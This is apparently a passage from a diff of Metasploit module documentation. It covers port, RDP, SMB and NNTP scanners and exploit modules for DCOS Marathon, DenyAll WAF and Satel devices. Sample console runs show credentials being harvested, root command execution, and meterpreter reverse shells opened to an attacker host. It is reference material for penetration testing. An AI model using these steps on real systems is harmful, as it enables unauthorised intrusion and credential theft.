user@bt {ssha}HFTkDsnNlLiaHN+sIS9VQarVGGXmYISn false
[+] Credentials saved in: /root/.msf4/loot/20170616185817_default_172.16.191.133_surgenews.user.c_633569.txt
[*] Scanned 1 of 2 hosts (50% complete)
[+] Found administrator credentials (test:test)
[+] Found user credentials (zxcv@win-sgbsd5tqutq:zxcv)
SurgeNews User Credentials
==========================
Username Password Password Hash Admin
-------- -------- ------------- -----
asdf@win-sgbsd5tqutq {ssha}8ytixKjxf3kaBc6T471R1Re/C8MUnKnF false
test test true
test@win-sgbsd5tqutq {ssha}Vw8EkFxAJuiZrb98Fz+sdr/yEEmBZ2Jc false
test@win-sgbsd5tqutq {ssha}j4teSf4CgA3+XVRJscFHyqoOQJRoLg4K false
zxcv@win-sgbsd5tqutq zxcv false
[+] Credentials saved in: /root/.msf4/loot/20170616185817_default_172.16.191.166_surgenews.user.c_077983.txt
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```

2
documentation/modules/auxiliary/scanner/ike/cisco_ike_benigncertain.md
View File

@ -9,7 +9,7 @@ The vulnerability is due to insufficient condition checks in the part of the cod
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf auxiliary(cisco_ike_benigncertain) > show options

30
documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md Normal file
View File

@ -0,0 +1,30 @@
## Vulnerable Application
Any system exposing the Cisco Smart Install (SMI) protocol, which typically runs on TCP port 4786.
## Verification Steps
1. Do: ```use auxiliary/scanner/misc/cisco_smart_install```
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of SMI
3. Do: ```run```
4. If the host is exposing an identifiable SMI instance, it will print the endpoint.
## Scenarios
```
msf auxiliary(cisco_smart_install) > run
[*] Scanned 57 of 512 hosts (11% complete)
[*] Scanned 105 of 512 hosts (20% complete)
[*] Scanned 157 of 512 hosts (30% complete)
[*] Scanned 212 of 512 hosts (41% complete)
[*] Scanned 256 of 512 hosts (50% complete)
[*] Scanned 310 of 512 hosts (60% complete)
[*] Scanned 368 of 512 hosts (71% complete)
[*] Scanned 413 of 512 hosts (80% complete)
[*] Scanned 466 of 512 hosts (91% complete)
[+] a.b.c.d:4786 - Fingerprinted the Cisco Smart Install protocol
[*] Scanned 512 of 512 hosts (100% complete)
[*] Auxiliary module execution completed
```

42
documentation/modules/auxiliary/scanner/nntp/nntp_login.md Normal file
View File

@ -0,0 +1,42 @@
## Description
This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension.
This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.
If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
## Vulnerable Application
This module has been tested successfully on:
* [SurgeNews](http://netwinsite.com/surgenews/) on Windows 7 SP 1.
* [SurgeNews](http://netwinsite.com/surgenews/) on Ubuntu Linux.
* [INN2](https://www.eyrie.org/~eagle/faqs/inn.html) on Debian Linux.
## Verification Steps
1. Do: `use auxiliary/scanner/nntp/nntp_login`
2. Do: `set RHOSTS [IP]`
3. Do: `set RPORT [IP]`
4. Do: `run`
## Scenarios
```
msf auxiliary(nntp_login) > run
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'asdf' : 'asdf'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'zxcv' : 'zxcv'
[+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'test' : 'test'
[*] Scanned 1 of 2 hosts (50% complete)
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'asdf' : 'asdf'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'admin' : 'admin'
[+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'user' : 'pass'
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```

59
documentation/modules/auxiliary/scanner/portscan/syn.md Normal file
View File

@ -0,0 +1,59 @@
## Description
This module will attempt to initiate a TCP/IP connection with ports on the victim machine. It is this done by sending a SYN packet, and if victim replies with a SYN/ACK packet
that means the port is open. Then the attacker sends a RST packet, and as a result the victim's machine assumes that there is a communication error.
The attacker now knows the state of port without a full tcp connection. Major benefit of TCP SYN scan is that most logging applications do not log the TCP/RST by default.
## Options
**PORTS**
This is the list of TCP ports to test on each host.
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
options is to scan `1-10000` ports.
**TIMEOUT**
Maximum time to wait for a response. The default value is 500 milliseconds.
**VERBOSE**
Gives detailed message about the scan of all the ports. It also shows the
ports that were closed.
## Verification Steps
1. Do: `use auxiliary/scanner/portscan/syn`
2. Do: `set RHOSTS [IP]`
3. Do: `set PORTS [PORTS]`
4. Do: `run`
5. If any of the TCP ports were open they will be discovered, status will be printed indicating as such.
## Scenarios
### Metaspliotable 2
```
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(syn) > set RHOSTS 192.168.45.159
RHOSTS => 192.168.45.159
msf auxiliary(syn) > set PORTS 1-10000
PORTS => 1-10000
msf auxiliary(syn) > run
[*] TCP OPEN 192.168.45.159:22
[*] TCP OPEN 192.168.45.159:23
[*] TCP OPEN 192.168.45.159:111
[*] TCP OPEN 192.168.45.159:445
[*] TCP OPEN 192.168.45.159:512
[*] TCP OPEN 192.168.45.159:513
[*] TCP OPEN 192.168.45.159:1099
[*] TCP OPEN 192.168.45.159:2121
[*] TCP OPEN 192.168.45.159:3306
[*] TCP OPEN 192.168.45.159:3632
[*] TCP OPEN 192.168.45.159:6000
[*] TCP OPEN 192.168.45.159:6697
[*] TCP OPEN 192.168.45.159:8009
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

71
documentation/modules/auxiliary/scanner/portscan/tcp.md Normal file
View File

@ -0,0 +1,71 @@
## Description
This module will enumerate open TCP services by performing a full TCP connect on each port. This will establish a complete three-way handshake (SYN -> SYN/ACK -> ACK) on the target port. This does not need administrative privileges on the source machine, which may be useful if pivoting.
## Vulnerable Application
Any reachable TCP endpoint is a potential target.
## Options
**PORTS**
This is the list of ports to test for TCP Scan on each host.
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
options is to scan `1-10000` ports.
**ConnectTimeout**
This options states the maximum number of seconds to establish a tcp
connection. Default value if `10`.
**VERBOSE**
Gives detailed message about the scan of all the ports. It also shows the
ports that were closed.
## Verification Steps
1. Do: ```use auxiliary/scanner/portscan/tcp```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set PORTS [PORTS]```
4. Do: ```run```
## Scenarios
### Metaspliotable 2
```
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.45.159
msf auxiliary(tcp) > set PORTS 1-10000
msf auxiliary(tcp) > run
[*] 192.168.45.159: - 192.168.45.159:25 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:21 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:23 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:22 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:53 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:80 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:111 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:139 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:445 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:513 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:514 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:512 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:1099 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:1524 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:2049 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:2121 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:3306 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:3632 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:5432 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:5900 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:6000 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:6667 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:6697 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:8009 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:8180 - TCP OPEN
[*] 192.168.45.159: - 192.168.45.159:8787 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

91
documentation/modules/auxiliary/scanner/portscan/xmas.md Normal file
View File

@ -0,0 +1,91 @@
# Description
This module is used to determine if the ports on target machine are closed. It sends probes containing the FIN, PSH and URG flags. Scan is faster and stealthier compared to some other scans. Following action are performed depending on the state of ports -
#### OPEN|FILTERED Port:
Detects open|filtered port via no response to the segment
#### Closed Port:
Detects a closed port via a RST received in response to the FIN
# Required Permissions
XMAS scan requires the use of raw sockets, and thus cannot be performed from some Windows
systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges.
# Options
**PORTS**
This is the list of TCP ports to test on each host.
Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default
options is to scan `1-10000` ports.
**Timeout**
This options states the reply read timeout in milliseconds. Default value if `500`.
**RHOSTS**
The target address range is defined in this option.
**VERBOSE**
Gives detailed message about the scan of all the ports. It also shows the
ports that were not open/filtered.
# Verification Steps
1. Do: `use auxiliary/scanner/portscan/xmas`
2. Do: `set RHOSTS [IP]`
3. Do: `set PORTS [PORTS]`
4. Do: `run`
5. The open/filtered ports will be discovered, status will be printed indicating as such.
# Scenarios
### Metaspliotable 2
```
msf > use auxiliary/scanner/portscan/xmas
msf auxiliary(xmas) > set rhosts 192.168.45.159
rhosts => 192.168.45.159
msf auxiliary(xmas) > set ports 1-100
ports => 1-100
msf auxiliary(xmas) > run
[*] TCP OPEN|FILTERED 192.168.45.159:1
[*] TCP OPEN|FILTERED 192.168.45.159:3
[*] TCP OPEN|FILTERED 192.168.45.159:5
[*] TCP OPEN|FILTERED 192.168.45.159:8
[*] TCP OPEN|FILTERED 192.168.45.159:12
[*] TCP OPEN|FILTERED 192.168.45.159:14
[*] TCP OPEN|FILTERED 192.168.45.159:16
[*] TCP OPEN|FILTERED 192.168.45.159:19
[*] TCP OPEN|FILTERED 192.168.45.159:21
[*] TCP OPEN|FILTERED 192.168.45.159:37
[*] TCP OPEN|FILTERED 192.168.45.159:39
[*] TCP OPEN|FILTERED 192.168.45.159:41
[*] TCP OPEN|FILTERED 192.168.45.159:43
[*] TCP OPEN|FILTERED 192.168.45.159:49
[*] TCP OPEN|FILTERED 192.168.45.159:52
[*] TCP OPEN|FILTERED 192.168.45.159:53
[*] TCP OPEN|FILTERED 192.168.45.159:55
[*] TCP OPEN|FILTERED 192.168.45.159:57
[*] TCP OPEN|FILTERED 192.168.45.159:59
[*] TCP OPEN|FILTERED 192.168.45.159:61
[*] TCP OPEN|FILTERED 192.168.45.159:63
[*] TCP OPEN|FILTERED 192.168.45.159:65
[*] TCP OPEN|FILTERED 192.168.45.159:67
[*] TCP OPEN|FILTERED 192.168.45.159:69
[*] TCP OPEN|FILTERED 192.168.45.159:73
[*] TCP OPEN|FILTERED 192.168.45.159:89
[*] TCP OPEN|FILTERED 192.168.45.159:91
[*] TCP OPEN|FILTERED 192.168.45.159:93
[*] TCP OPEN|FILTERED 192.168.45.159:95
[*] TCP OPEN|FILTERED 192.168.45.159:97
[*] TCP OPEN|FILTERED 192.168.45.159:99
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

66
documentation/modules/auxiliary/scanner/rdp/rdp_scanner.md Normal file
View File

@ -0,0 +1,66 @@
## Vulnerable Application
Any system exposing the remote desktop protocol, RDP, typically on 3389/TCP.
## Verification Steps
1. Do: ```use auxiliary/scanner/rdp/rdp_scanner```
2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of RDP
3. Do: ```run```
4. If the host is exposing an identifiable RDP instance, it will print the endpoint.
## Options
There are three options currently supported that control what security protocols to
send in the RDP negotiation request, which can be helpful in identifying RDP
endpoints that might be locked down or configured differently:
**TLS** Set to true to request TLS security support
**CredSSP** Set to true to request CredSSP support
**EarlyUser** Set to true to request Early User Authorization Result PDU support
## Scenarios
```
msf auxiliary(rdp_scanner) > run
[+] 10.4.18.26:3389 - Identified RDP
[+] 10.4.18.22:3389 - Identified RDP
[+] 10.4.18.89:3389 - Identified RDP
[+] 10.4.18.9:3389 - Identified RDP
[+] 10.4.18.67:3389 - Identified RDP
[+] 10.4.18.80:3389 - Identified RDP
[+] 10.4.18.34:3389 - Identified RDP
[+] 10.4.18.70:3389 - Identified RDP
[+] 10.4.18.30:3389 - Identified RDP
[+] 10.4.18.76:3389 - Identified RDP
[+] 10.4.18.13:3389 - Identified RDP
[+] 10.4.18.91:3389 - Identified RDP
[+] 10.4.18.5:3389 - Identified RDP
[+] 10.4.18.47:3389 - Identified RDP
[+] 10.4.18.41:3389 - Identified RDP
[+] 10.4.18.105:3389 - Identified RDP
[*] Scanned 44 of 256 hosts (17% complete)
[*] Scanned 55 of 256 hosts (21% complete)
[+] 10.4.18.118:3389 - Identified RDP
[+] 10.4.18.108:3389 - Identified RDP
[+] 10.4.18.139:3389 - Identified RDP
[*] Scanned 94 of 256 hosts (36% complete)
[*] Scanned 110 of 256 hosts (42% complete)
[+] 10.4.18.157:3389 - Identified RDP
[+] 10.4.18.166:3389 - Identified RDP
[+] 10.4.18.164:3389 - Identified RDP
[+] 10.4.18.170:3389 - Identified RDP
[+] 10.4.18.185:3389 - Identified RDP
[+] 10.4.18.209:3389 - Identified RDP
[+] 10.4.18.188:3389 - Identified RDP
[*] Scanned 156 of 256 hosts (60% complete)
[+] 10.4.18.237:3389 - Identified RDP
[+] 10.4.18.225:3389 - Identified RDP
[*] Scanned 186 of 256 hosts (72% complete)
[*] Scanned 194 of 256 hosts (75% complete)
[*] Scanned 208 of 256 hosts (81% complete)
[*] Scanned 253 of 256 hosts (98% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```

55
documentation/modules/auxiliary/scanner/smb/smb1.md Normal file
View File

@ -0,0 +1,55 @@
# Description
This module scans for hosts that support the SMBv1 protocol. It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects:
```PC NETWORK PROGRAM 1.0
LANMAN1.0
Windows for Workgroups 3.1a
LM1.2X002
LANMAN2.1
NT LM 0.12
```
If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected.
If the SMB server does not support SMBv1 a RST will be sent.
___
# Usage
The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not.
#### A host that does support SMBv1.
```
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
msf auxiliary(smb1) > set RHOSTS x.x.x.x
RHOSTS => x.x.x.x
msf auxiliary(smb1) > run
[+] x.x.x.x:445 - x.x.x.x supports SMBv1 dialect.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb1) > services -S x.x.x.x
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
x.x.x.x 445 tcp smb1 open
```
#### A host that does not support SMBv1
```
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
msf auxiliary(smb1) > set RHOSTS y.y.y.y
RHOSTS => y.y.y.y
msf auxiliary(smb1) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
___
## Options
The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation. It can also be set using hosts from the database using ```hosts -R```.

8
documentation/modules/auxiliary/scanner/snmp/cambium_snmp_loot.md
View File

@ -1,6 +1,8 @@
Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation.
Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information.
This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation.
The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units.
The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication.
The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units.
Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the THREADS. Backup url can also be retrieved by quering the OID as follows:
@ -16,7 +18,7 @@ snmpget -v2c -c public 1.3.3.7 1.3.6.1.4.1.17713.21.6.4.13.0
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
## Scenarios
```
msf > use auxiliary/scanner/snmp/epmp_snmp_loot

2
documentation/modules/auxiliary/scanner/ssh/ssh_login.md
View File

@ -14,7 +14,7 @@
5. Do: `run`
6. You will hopefully see something similar to, followed by a session:
````[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '```
```[+] SSH - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '```
## Options

28
documentation/modules/auxiliary/scanner/telnet/satel_cmd_exec.md Normal file
View File

@ -0,0 +1,28 @@
This module exploits an OS Command Injection vulnerability in Satel SenNet Data Logger and Electricity Meters to perform arbitrary command execution as 'root'.
The following versions of SenNet Data Logger and Electricity Meters, monitoring platforms, are affected:
1. SenNet Optimal DataLogger V5.37c-1.43c and prior,
2. SenNet Solar Datalogger V5.03-1.56a and prior, and
3. SenNet Multitask Meter V5.21a-1.18b and prior.
## Verification Steps
1. Do: ```use auxiliary/scanner/telnet/satel_cmd_exec```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```run```
## Sample Output
```
msf > use auxiliary/scanner/telnet/satel_cmd_exec
msf auxiliary(satel_cmd_exec) > set rhosts 1.3.3.7
msf auxiliary(satel_cmd_exec) > run
[*] 1.3.3.7:5000 - Sending command now - id;
[+] 1.3.3.7:5000 - uid=0(root) gid=0(root)
[+] 1.3.3.7:5000 - File saved in: /root/.msf4/loot/20000000000003_1.3.3.7_cmdexeclog_12345.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

2
documentation/modules/exploit/linux/http/centreon_useralias_exec.md
View File

@ -187,7 +187,7 @@ finish
## Scenarios
Just a standard run.
```
msf > use exploit/linux/http/centreon_useralias_exec
msf exploit(centreon_useralias_exec) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python

192
documentation/modules/exploit/linux/http/dcos_marathon.md Normal file
View File

@ -0,0 +1,192 @@
# Vulnerable Application
Utilizing the DCOS Cluster's Marathon UI, an attacker can create
a docker container with the '/' path mounted with read/write
permissions on the host server that is running the docker container.
As the docker container executes command as uid 0 it is honored
by the host operating system allowing the attacker to edit/create
files owed by root. This exploit abuses this to creates a cron job
in the '/etc/cron.d/' path of the host server.
*Notes: The docker image must be a valid docker image from
hub.docker.com. Further more the docker container will only
deploy if there are resources available in the DC/OS
## DCOS
This Exploit was tested with CentOS 7 as the host operating system for
the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with
Default 'custom' installation for on site premise setup. Only the Install
part of the DCOS guide was completed, the system hardening and securing
your cluster section where skipped. This is to represent a 'Default' install
with a system admin conducting hasty deployments taking no thought about security.
## To Setup Your Cluster
I recommend doing a 'on-premise'/custom
cluster. https://dcos.io/docs/1.8/administration/installing/custom/
Create a virtual CentOS machine, install requirements base on the above
guide.
```bash
# The TLDR from the above guide
sudo systemctl stop firewalld && sudo systemctl disable firewalld
sudo yum install -y tar xz unzip curl ipset ntp
sudo systemctl start ntpd
sudo systemctl enable ntpd
sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \
sudo groupadd nogroup && sudo reboot
```
Install a supported version of docker on the CentOS systems
https://dcos.io/docs/1.8/administration/installing/custom/system-requirements/install-docker-centos/
```bash
# The TLDR of the above guide
sudo yum -y remove docker docker-common container-selinux
sudo yum -y remove docker-selinux
sudo yum install -y yum-utils
sudo yum-config-manager \
--add-repo \
https://docs.docker.com/engine/installation/linux/repo_files/centos/docker.repo
sudo yum-config-manager --enable docker-testing
sudo yum makecache fast
sudo yum -y install docker-engine-1.11.2
sudo systemctl start docker
sudo systemctl enable docker
sudo echo overlay > /etc/modules-load.d/overlay.conf
sudo reboot
```
Once the CentOS machine has rebooted, edit the systemctl
service file for docker and change the ExecStart- line to
`ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://`
restart the docker service and verify it is running.
lastly generate ssh rsa keys for authentication. And update the
/etc/ssh/sshd_config file to support root login.
```bash
ssh-keygen -t rsa -b 4096
# Press enter until complete, DO NOT PUT A PASSWORD.
cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys
cat ~/.ssh/id_rsa # save the output you will need it for later
rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later
```
Shut down the CentOS vm, take a snapshot. (This will be your base)
clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent.
Start the DCOS-Master and DCOS-Agent virtual machines You just cloned.
Login and get their current IP address.
* Note: I recommend giving them static IPs if you have further use for the cluster.
From here use another Linux machine with docker installed to finish
the installation process. I used an Ubuntu machine with docker installed.
Follow the custom CLI guide for creating the required files in
the genconf folder.
https://dcos.io/docs/1.8/administration/installing/custom/cli/
Example genconf/config.yaml
```
---
agent_list:
- 192.168.0.10
bootstrap_url: file:///opt/dcos_install_tmp
cluster_name: DCOS
exhibitor_storage_backend: static
ip_detect_filename: /genconf/ip-detect
master_discovery: static
master_list:
- 192.168.0.9
process_timeout: 10000
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
ssh_user: root
```
Example genconf/ip-detect
```bash
#!/usr/bin/env bash
set -o nounset -o errexit
export PATH=/usr/sbin:/usr/bin:$PATH
ip=$(ip addr show ens33)
echo $( echo $ip | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1)
```
place your id_rsa ssh key into the genconf file and rename the
file to ssh_key and `chmod 0600 genconf/ssh_key`
Deploying the cluster
in the folder containing the genconf folder do the following.
NOTE: if following the cli install from DCOS itself, it will fail
if you do --install-prereqs. It will install an unsupported version of
docker.
```bash
curl -O https://downloads.dcos.io/dcos/stable/dcos_generate_config.sh
chmod +x dcos_generate_config.sh
sudo ./dcos_generate_config.sh --genconf
sudo ./dcos_generate_config.sh --preflight
# If all preflight checks pass
sudo ./dcos_generate_config.sh --deploy
# get a cup of coffie
# wait a minute or two after deploy completes
sudo bash dcos_generate_config.sh --postflight
```
If all is passing navigate to http://[master_ip]:8080/
You should see the Marathon UI web application.
# Exploitation
This module is designed for the attacker to leverage, creation of a
docker container with out authentication through the DCOS Marathon UI
to gain root access to the hosting server of the docker container
in the DCOS cluster.
## Options
- DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit.
- TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps
- WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start.
- CONTAINER_ID is optional if you want to have your container docker have a human readable name else it will be randomly generated
## Steps to exploit with module
- [ ] Start msfconsole
- [ ] use exploit/linux/http/dcos_marathon
- [ ] Set the options appropriately and set VERBOSE to true
- [ ] Verify it creates a docker container and it successfully runs
- [ ] After a minute a session should be opened from the agent server
## Example Output
```
msf > use exploit/linux/http/dcos_marathon
msf exploit(dcos_marathon) > set RHOST 192.168.0.9
RHOST => 192.168.0.9
msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(dcos_marathon) > set LHOST 192.168.0.100
LHOST => 192.168.0.100
msf exploit(dcos_marathon) > set verbose true
verbose => true
msf exploit(dcos_marathon) > check
[*] 192.168.0.9:8080 The target appears to be vulnerable.
msf exploit(dcos_marathon) > exploit
[*] Started reverse TCP handler on 192.168.0.100:4444
[*] Setting container json request variables
[*] Creating the docker container command
[*] The docker container is created, waiting for it to deploy
[*] Waiting up to 60 seconds for docker container to start
[*] The docker container is running, removing it
[*] Waiting for the cron job to run, can take up to 60 seconds
[*] Sending stage (39690 bytes) to 192.168.0.10
[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.10:54468) at 2017-03-01 14:22:02 -0500
[+] Deleted /etc/cron.d/FOWkTeZL
[+] Deleted /tmp/TIWpOfUR
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UTC 2016
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
```

47
documentation/modules/exploit/linux/http/denyall_waf_exec.md Normal file
View File

@ -0,0 +1,47 @@
## Vulnerable Application
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
It's possible to have trial demo for 15 days at Amazon Marketplace.
[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
You just need to follow instruction above URL.
## Verification Steps
A successful check of the exploit will look like this:
- [ ] Start `msfconsole`
- [ ] `use use exploit/linux/http/denyall_exec`
- [ ] Set `RHOST`
- [ ] Set `LHOST`
- [ ] Run `check`
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `iToken` value extraction.
- [ ] **Verify** that you are getting `meterpreter` session.
## Scenarios
```
msf > use exploit/linux/http/denyall_exec
msf exploit(denyall_exec) >
msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit
[*] Started reverse TCP handler on 35.12.3.3:4444
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Trigerring command injection vulnerability with iToken value.
[*] Sending stage (40411 bytes) to 35.176.123.128
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter >
```

Some files were not shown because too many files have changed in this diff Show More